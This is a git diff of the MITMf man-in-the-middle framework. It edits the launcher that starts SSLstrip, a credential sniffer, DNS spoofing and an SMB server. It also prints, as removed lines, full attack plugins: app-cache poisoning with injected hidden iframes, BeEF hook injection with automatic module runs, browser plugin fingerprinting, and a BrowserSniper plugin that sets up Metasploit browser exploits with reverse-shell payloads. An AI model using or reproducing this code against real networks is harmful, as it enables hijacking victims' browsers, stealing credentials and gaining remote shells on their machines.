||||||
|
|
||||||
p.initialize(args)
|
|
||||||
|
|
||||||
if p.tree_info:
|
|
||||||
for line in xrange(0, len(p.tree_info)):
|
|
||||||
print "| |_ {}".format(p.tree_info.pop())
|
|
||||||
|
|
||||||
ProxyPlugins.getInstance().addPlugin(p)
|
|
||||||
|
|
||||||
#Plugins are ready to go, let's rock & roll
|
|
||||||
from core.sslstrip.StrippingProxy import StrippingProxy
|
from core.sslstrip.StrippingProxy import StrippingProxy
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
from core.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
|
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
||||||
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
||||||
|
|
||||||
strippingFactory = http.HTTPFactory(timeout=10)
|
strippingFactory = http.HTTPFactory(timeout=10)
|
||||||
strippingFactory.protocol = StrippingProxy
|
strippingFactory.protocol = StrippingProxy
|
||||||
|
|
||||||
reactor.listenTCP(args.listen, strippingFactory)
|
reactor.listenTCP(options.listen_port, strippingFactory)
|
||||||
|
|
||||||
for p in ProxyPlugins.getInstance().plist:
|
#All our options should be loaded now, start initializing the plugins
|
||||||
|
print "[*] MITMf v0.9.8 - 'The Dark Side'"
|
||||||
|
for plugin in plugins:
|
||||||
|
|
||||||
p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
|
#load only the plugins that have been called at the command line
|
||||||
p.startConfigWatch()
|
if vars(options)[plugin.optname] is True:
|
||||||
|
|
||||||
if hasattr(p, 'startThread'):
|
print "|_ {} v{}".format(plugin.name, plugin.version)
|
||||||
t = threading.Thread(name='{}-Thread'.format(p.name), target=p.startThread)
|
if plugin.tree_info:
|
||||||
t.setDaemon(True)
|
for line in xrange(0, len(plugin.tree_info)):
|
||||||
t.start()
|
print "| |_ {}".format(plugin.tree_info.pop())
|
||||||
|
|
||||||
|
plugin.initialize(options)
|
||||||
|
|
||||||
|
if plugin.tree_info:
|
||||||
|
for line in xrange(0, len(plugin.tree_info)):
|
||||||
|
print "| |_ {}".format(plugin.tree_info.pop())
|
||||||
|
|
||||||
|
ProxyPlugins.getInstance().addPlugin(plugin)
|
||||||
|
plugin.reactor(strippingFactory)
|
||||||
|
plugin.setup_logger()
|
||||||
|
plugin.start_config_watch()
|
||||||
|
|
||||||
print "|"
|
print "|"
|
||||||
print "|_ Sergio-Proxy v{} online".format(sergio_version)
|
print "|_ Sergio-Proxy v0.2.1 online"
|
||||||
print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
|
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
|
||||||
|
|
||||||
#Start Net-Creds
|
#Start Net-Creds
|
||||||
from core.netcreds.NetCreds import NetCreds
|
from core.netcreds.NetCreds import NetCreds
|
||||||
NetCreds().start(args.interface, myip)
|
NetCreds().start(options.interface)
|
||||||
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
||||||
|
|
||||||
#Start DNSChef
|
#Start DNSChef
|
||||||
|
@ -184,8 +128,8 @@ print "|_ DNSChef v{} online".format(DNSChef.version)
|
||||||
|
|
||||||
#Start the SMB server
|
#Start the SMB server
|
||||||
from core.servers.smb.SMBserver import SMBserver
|
from core.servers.smb.SMBserver import SMBserver
|
||||||
print "|_ SMB server online [Mode: {}] (Impacket {}) \n".format(SMBserver.getInstance().server_type, SMBserver.getInstance().impacket_ver)
|
|
||||||
SMBserver.getInstance().start()
|
SMBserver.getInstance().start()
|
||||||
|
print "|_ SMB server online [Mode: {}] (Impacket {}) \n".format(SMBserver.getInstance().server_type, SMBserver.getInstance().impacket_ver)
|
||||||
|
|
||||||
#start the reactor
|
#start the reactor
|
||||||
reactor.run()
|
reactor.run()
|
||||||
|
|
0
other_setup.sh
Normal file → Executable file
0
other_setup.sh
Normal file → Executable file
|
@ -1,203 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
import os.path
|
|
||||||
import time
|
|
||||||
import sys
|
|
||||||
|
|
||||||
from datetime import date
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class AppCachePlugin(Plugin):
|
|
||||||
name = "AppCachePoison"
|
|
||||||
optname = "appoison"
|
|
||||||
desc = "Performs App Cache Poisoning attacks"
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.mass_poisoned_browsers = []
|
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
|
||||||
|
|
||||||
self.urlMonitor.setAppCachePoisoning()
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
|
|
||||||
#This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
|
|
||||||
|
|
||||||
self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
|
|
||||||
url = request.client.uri
|
|
||||||
req_headers = request.client.getAllHeaders()
|
|
||||||
headers = request.client.responseHeaders
|
|
||||||
ip = request.client.getClientIP()
|
|
||||||
|
|
||||||
#########################################################################
|
|
||||||
|
|
||||||
if "enable_only_in_useragents" in self.app_config:
|
|
||||||
regexp = self.app_config["enable_only_in_useragents"]
|
|
||||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
|
||||||
mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"]))
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
urls = self.urlMonitor.getRedirectionSet(url)
|
|
||||||
mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls))
|
|
||||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
|
||||||
|
|
||||||
if s is False:
|
|
||||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name))
|
|
||||||
p = self.getTemplatePrefix(s)
|
|
||||||
|
|
||||||
if element == 'tamper':
|
|
||||||
mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p))
|
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
|
||||||
f = open(p + '.replace','r')
|
|
||||||
data = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
|
|
||||||
elif os.path.exists(p + '.append'): # append file to body
|
|
||||||
f = open(p + '.append','r')
|
|
||||||
appendix = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
# append to body
|
|
||||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
|
||||||
|
|
||||||
# add manifest reference
|
|
||||||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
|
||||||
|
|
||||||
elif element == "manifest":
|
|
||||||
mitmf_logger.info("{} [{}] Poisoning manifest URL".format(ip, self.name))
|
|
||||||
data = self.getSpoofedManifest(url, s)
|
|
||||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
|
||||||
|
|
||||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
|
||||||
mitmf_logger.info("{} [{}] Poisoning raw URL".format(ip, self.name))
|
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
|
||||||
f = open(p + '.replace','r')
|
|
||||||
data = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
|
|
||||||
elif os.path.exists(p + '.append'): # append file to body
|
|
||||||
f = open(p + '.append','r')
|
|
||||||
appendix = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
# append to response body
|
|
||||||
data += appendix
|
|
||||||
|
|
||||||
self.cacheForFuture(headers)
|
|
||||||
self.removeDangerousHeaders(headers)
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
||||||
|
|
||||||
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
|
||||||
browser_id = ip + req_headers.get("user-agent", "")
|
|
||||||
|
|
||||||
if not 'mass_poison_url_match' in self.app_config: # no url
|
|
||||||
return data
|
|
||||||
if browser_id in self.mass_poisoned_browsers: #already poisoned
|
|
||||||
return data
|
|
||||||
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
|
|
||||||
return data
|
|
||||||
if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
|
|
||||||
return data
|
|
||||||
if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
|
|
||||||
return data
|
|
||||||
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
|
||||||
return data
|
|
||||||
|
|
||||||
mitmf_logger.debug("[{}] Adding AppCache mass poison for URL {}, id {}".format(self.name, url, browser_id))
|
|
||||||
appendix = self.getMassPoisonHtml()
|
|
||||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
|
||||||
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
|
|
||||||
return data
|
|
||||||
|
|
||||||
def getMassPoisonHtml(self):
|
|
||||||
html = "<div style=\"position:absolute;left:-100px\">"
|
|
||||||
for i in self.app_config:
|
|
||||||
if isinstance(self.app_config[i], dict):
|
|
||||||
if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False):
|
|
||||||
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.app_config[i]['tamper_url'] + "\"></iframe>"
|
|
||||||
|
|
||||||
return html + "</div>"
|
|
||||||
|
|
||||||
def cacheForFuture(self, headers):
|
|
||||||
ten_years = 315569260
|
|
||||||
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
|
|
||||||
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
|
|
||||||
in_ten_years = date.fromtimestamp(time.time() + ten_years)
|
|
||||||
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
|
|
||||||
|
|
||||||
def removeDangerousHeaders(self, headers):
|
|
||||||
headers.removeHeader("X-Frame-Options")
|
|
||||||
|
|
||||||
def getSpoofedManifest(self, url, section):
|
|
||||||
p = self.getTemplatePrefix(section)
|
|
||||||
if not os.path.exists(p+'.manifest'):
|
|
||||||
p = self.getDefaultTemplatePrefix()
|
|
||||||
|
|
||||||
f = open(p + '.manifest', 'r')
|
|
||||||
manifest = f.read()
|
|
||||||
f.close()
|
|
||||||
return self.decorate(manifest, section)
|
|
||||||
|
|
||||||
def decorate(self, content, section):
|
|
||||||
for i in section:
|
|
||||||
content = content.replace("%%"+i+"%%", section[i])
|
|
||||||
return content
|
|
||||||
|
|
||||||
def getTemplatePrefix(self, section):
|
|
||||||
if section.has_key('templates'):
|
|
||||||
return self.app_config['templates_path'] + '/' + section['templates']
|
|
||||||
|
|
||||||
return self.getDefaultTemplatePrefix()
|
|
||||||
|
|
||||||
def getDefaultTemplatePrefix(self):
|
|
||||||
return self.app_config['templates_path'] + '/default'
|
|
||||||
|
|
||||||
def getManifestUrl(self, section):
|
|
||||||
return section.get("manifest_url",'/robots.txt')
|
|
||||||
|
|
||||||
def getSectionForUrls(self, urls):
|
|
||||||
for url in urls:
|
|
||||||
for i in self.app_config:
|
|
||||||
if isinstance(self.app_config[i], dict): #section
|
|
||||||
section = self.app_config[i]
|
|
||||||
name = i
|
|
||||||
|
|
||||||
if section.get('tamper_url',False) == url:
|
|
||||||
return (name, section, 'tamper',url)
|
|
||||||
|
|
||||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
|
||||||
return (name, section, 'tamper',url)
|
|
||||||
|
|
||||||
if section.get('manifest_url',False) == url:
|
|
||||||
return (name, section, 'manifest',url)
|
|
||||||
|
|
||||||
if section.get('raw_url',False) == url:
|
|
||||||
return (name, section, 'raw',url)
|
|
||||||
|
|
||||||
return (None, False,'',urls.copy().pop())
|
|
|
@ -1,122 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import sys
|
|
||||||
import json
|
|
||||||
import threading
|
|
||||||
|
|
||||||
from time import sleep
|
|
||||||
from core.beefapi import BeefAPI
|
|
||||||
from core.utils import SystemConfig, shutdown
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.Inject import Inject
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class BeefAutorun(Inject, Plugin):
|
|
||||||
name = "BeEFAutorun"
|
|
||||||
optname = "beefauto"
|
|
||||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.ip_address = SystemConfig.getIP(options.interface)
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
|
|
||||||
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
|
|
||||||
|
|
||||||
beefconfig = self.config['MITMf']['BeEF']
|
|
||||||
|
|
||||||
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
|
|
||||||
|
|
||||||
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
|
||||||
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
|
|
||||||
shutdown("[BeEFAutorun] Error logging in to BeEF!")
|
|
||||||
|
|
||||||
def startThread(self):
|
|
||||||
self.autorun()
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
self.initialize(self.options)
|
|
||||||
|
|
||||||
def autorun(self):
|
|
||||||
already_ran = []
|
|
||||||
already_hooked = []
|
|
||||||
|
|
||||||
while True:
|
|
||||||
mode = self.config['BeEFAutorun']['mode']
|
|
||||||
|
|
||||||
for hook in self.beef.hooked_browsers.online:
|
|
||||||
|
|
||||||
if hook.session not in already_hooked:
|
|
||||||
mitmf_logger.info("{} [BeEFAutorun] Joined the horde! [id:{}, type:{}-{}, os:{}]".format(hook.ip, hook.id, hook.name, hook.version, hook.os))
|
|
||||||
already_hooked.append(hook.session)
|
|
||||||
self.black_ips.append(hook.ip)
|
|
||||||
|
|
||||||
if mode == 'oneshot':
|
|
||||||
if hook.session not in already_ran:
|
|
||||||
self.execModules(hook)
|
|
||||||
already_ran.append(hook.session)
|
|
||||||
|
|
||||||
elif mode == 'loop':
|
|
||||||
self.execModules(hook)
|
|
||||||
sleep(10)
|
|
||||||
|
|
||||||
sleep(1)
|
|
||||||
|
|
||||||
def execModules(self, hook):
|
|
||||||
all_modules = self.config['BeEFAutorun']["ALL"]
|
|
||||||
targeted_modules = self.config['BeEFAutorun']["targets"]
|
|
||||||
|
|
||||||
if all_modules:
|
|
||||||
mitmf_logger.info("{} [BeEFAutorun] Sending generic modules".format(hook.ip))
|
|
||||||
|
|
||||||
for module, options in all_modules.iteritems():
|
|
||||||
|
|
||||||
for m in self.beef.modules.findbyname(module):
|
|
||||||
resp = m.run(hook.session, json.loads(options))
|
|
||||||
|
|
||||||
if resp["success"] == 'true':
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
|
|
||||||
else:
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
|
|
||||||
|
|
||||||
sleep(0.5)
|
|
||||||
|
|
||||||
if (hook.name and hook.os):
|
|
||||||
for os in targeted_modules:
|
|
||||||
if (os == hook.os) or (os in hook.os):
|
|
||||||
mitmf_logger.info("{} [BeEFAutorun] Sending targeted modules".format(hook.ip))
|
|
||||||
|
|
||||||
for browser in targeted_modules[os]:
|
|
||||||
if browser == hook.name:
|
|
||||||
for module, options in targeted_modules[os][browser].iteritems():
|
|
||||||
for m in self.beef.modules.findbyname(module):
|
|
||||||
resp = m.run(hook.session, json.loads(options))
|
|
||||||
if resp["success"] == 'true':
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
|
|
||||||
else:
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
|
|
||||||
|
|
||||||
sleep(0.5)
|
|
|
@ -1,65 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
import logging
|
|
||||||
|
|
||||||
from pprint import pformat
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.Inject import Inject
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class BrowserProfiler(Inject, Plugin):
|
|
||||||
name = "BrowserProfiler"
|
|
||||||
optname = "browserprofiler"
|
|
||||||
desc = "Attempts to enumerate all browser plugins of connected clients"
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.output = {} # so other plugins can access the results
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
self.html_payload = self.get_payload()
|
|
||||||
|
|
||||||
def post2dict(self, post): #converts the ajax post to a dic
|
|
||||||
d = dict()
|
|
||||||
for line in post.split('&'):
|
|
||||||
t = line.split('=')
|
|
||||||
d[t[0]] = t[1]
|
|
||||||
return d
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
#Handle the plugin output
|
|
||||||
if 'clientprfl' in request.uri:
|
|
||||||
request.printPostData = False
|
|
||||||
|
|
||||||
self.output = self.post2dict(request.postData)
|
|
||||||
self.output['ip'] = request.client.getClientIP()
|
|
||||||
self.output['useragent'] = request.clientInfo
|
|
||||||
|
|
||||||
if self.output['plugin_list']:
|
|
||||||
self.output['plugin_list'] = self.output['plugin_list'].split(',')
|
|
||||||
|
|
||||||
pretty_output = pformat(self.output)
|
|
||||||
mitmf_logger.info("{} [BrowserProfiler] Got data:\n{}".format(request.client.getClientIP(), pretty_output))
|
|
||||||
|
|
||||||
def get_payload(self):
|
|
||||||
plugindetect = open("./core/javascript/plugindetect.js", 'r').read()
|
|
||||||
return '<script type="text/javascript">' + plugindetect + '</script>'
|
|
|
@ -1,194 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import string
|
|
||||||
import random
|
|
||||||
import logging
|
|
||||||
|
|
||||||
from time import sleep
|
|
||||||
from core.msfrpc import Msf
|
|
||||||
from core.utils import SystemConfig, shutdown
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.BrowserProfiler import BrowserProfiler
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class BrowserSniper(BrowserProfiler, Plugin):
|
|
||||||
name = "BrowserSniper"
|
|
||||||
optname = "browsersniper"
|
|
||||||
desc = "Performs drive-by attacks on clients with out-of-date browser plugins"
|
|
||||||
version = "0.4"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.msfip = SystemConfig.getIP(options.interface)
|
|
||||||
self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit
|
|
||||||
|
|
||||||
#Initialize the BrowserProfiler plugin
|
|
||||||
BrowserProfiler.initialize(self, options)
|
|
||||||
|
|
||||||
msfversion = Msf().version()
|
|
||||||
self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
|
|
||||||
|
|
||||||
def startThread(self):
|
|
||||||
self.snipe()
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
self.initialize(self.options)
|
|
||||||
|
|
||||||
def _genRandURL(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
|
|
||||||
return "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
|
|
||||||
|
|
||||||
def _getRandPort(self):
|
|
||||||
return random.randint(1000, 65535)
|
|
||||||
|
|
||||||
def _setupExploit(self, exploit, msfport):
|
|
||||||
|
|
||||||
rand_url = self._genRandURL()
|
|
||||||
rand_port = self._getRandPort()
|
|
||||||
#generate the command string to send to the virtual console
|
|
||||||
#new line character very important as it simulates a user pressing enter
|
|
||||||
cmd = "use exploit/{}\n".format(exploit)
|
|
||||||
cmd += "set SRVPORT {}\n".format(msfport)
|
|
||||||
cmd += "set URIPATH {}\n".format(rand_url)
|
|
||||||
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
|
|
||||||
cmd += "set LHOST {}\n".format(self.msfip)
|
|
||||||
cmd += "set LPORT {}\n".format(rand_port)
|
|
||||||
cmd += "set ExitOnSession False\n"
|
|
||||||
cmd += "exploit -j\n"
|
|
||||||
|
|
||||||
Msf().sendcommand(cmd)
|
|
||||||
|
|
||||||
return (rand_url, rand_port)
|
|
||||||
|
|
||||||
def _compat_system(self, os_config, brw_config):
|
|
||||||
os = self.output['useragent'][0].lower()
|
|
||||||
browser = self.output['useragent'][1].lower()
|
|
||||||
|
|
||||||
if (os_config == 'any') and (brw_config == 'any'):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if (os_config == 'any') and (brw_config in browser):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if (os_config in os) and (brw_config == 'any'):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if (os_config in os) and (brw_config in browser):
|
|
||||||
return True
|
|
||||||
|
|
||||||
return False
|
|
||||||
|
|
||||||
def getExploits(self):
|
|
||||||
exploits = list()
|
|
||||||
vic_ip = self.output['ip']
|
|
||||||
|
|
||||||
#First get the client's info
|
|
||||||
java = None
|
|
||||||
if (self.output['java_installed'] == '1') and (self.output['java_version'] != 'null'):
|
|
||||||
java = self.output['java_version']
|
|
||||||
|
|
||||||
flash = None
|
|
||||||
if (self.output['flash_installed'] == '1') and (self.output['flash_version'] != 'null'):
|
|
||||||
flash = self.output['flash_version']
|
|
||||||
|
|
||||||
mitmf_logger.debug("{} [BrowserSniper] Java installed: {} | Flash installed: {}".format(vic_ip, java, flash))
|
|
||||||
|
|
||||||
for exploit, details in self.config['BrowserSniper'].iteritems():
|
|
||||||
|
|
||||||
if self._compat_system(details['OS'].lower(), details['Browser'].lower()):
|
|
||||||
|
|
||||||
if details['Type'].lower() == 'browservuln':
|
|
||||||
exploits.append(exploit)
|
|
||||||
|
|
||||||
elif details['Type'].lower() == 'pluginvuln':
|
|
||||||
|
|
||||||
if details['Plugin'].lower() == 'java':
|
|
||||||
if (java is not None) and (java in details['PluginVersions']):
|
|
||||||
exploits.append(exploit)
|
|
||||||
|
|
||||||
elif details['Plugin'].lower() == 'flash':
|
|
||||||
|
|
||||||
if (flash is not None) and (flash in details['PluginVersions']):
|
|
||||||
exploits.append(exploit)
|
|
||||||
|
|
||||||
mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits))
|
|
||||||
return exploits
|
|
||||||
|
|
||||||
def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions
|
|
||||||
|
|
||||||
#inject iframe
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip))
|
|
||||||
self.html_payload = inject_payload #temporarily changes the code that the Browserprofiler plugin injects
|
|
||||||
|
|
||||||
#The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds
|
|
||||||
#Will also make sure the shell actually came from the box that we targeted
|
|
||||||
mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip))
|
|
||||||
|
|
||||||
poll_n = 1
|
|
||||||
msf = Msf()
|
|
||||||
while poll_n != 30:
|
|
||||||
|
|
||||||
if msf.sessionsfrompeer(ip):
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip))
|
|
||||||
self.sploited_ips.append(ip)
|
|
||||||
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
|
|
||||||
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
|
|
||||||
return
|
|
||||||
|
|
||||||
poll_n += 1
|
|
||||||
sleep(2)
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip))
|
|
||||||
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
|
|
||||||
|
|
||||||
def snipe(self):
|
|
||||||
while True:
|
|
||||||
if self.output:
|
|
||||||
vic_ip = self.output['ip']
|
|
||||||
msfport = self.config['MITMf']['Metasploit']['msfport']
|
|
||||||
exploits = self.getExploits()
|
|
||||||
|
|
||||||
if not exploits:
|
|
||||||
if vic_ip not in self.sploited_ips:
|
|
||||||
mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
|
|
||||||
self.sploited_ips.append(vic_ip)
|
|
||||||
self.black_ips = self.sploited_ips
|
|
||||||
|
|
||||||
elif exploits and (vic_ip not in self.sploited_ips):
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
|
|
||||||
inject_payload = ''
|
|
||||||
|
|
||||||
msf = Msf()
|
|
||||||
for exploit in exploits:
|
|
||||||
|
|
||||||
pid = msf.findpid(exploit)
|
|
||||||
if pid:
|
|
||||||
mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit))
|
|
||||||
url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit
|
|
||||||
inject_payload += "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>".format(self.msfip, msfport, url)
|
|
||||||
else:
|
|
||||||
url, port = self._setupExploit(exploit, msfport)
|
|
||||||
inject_payload += "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>".format(self.msfip, port, url)
|
|
||||||
|
|
||||||
self.injectAndPoll(vic_ip, inject_payload)
|
|
||||||
|
|
||||||
sleep(1)
|
|
|
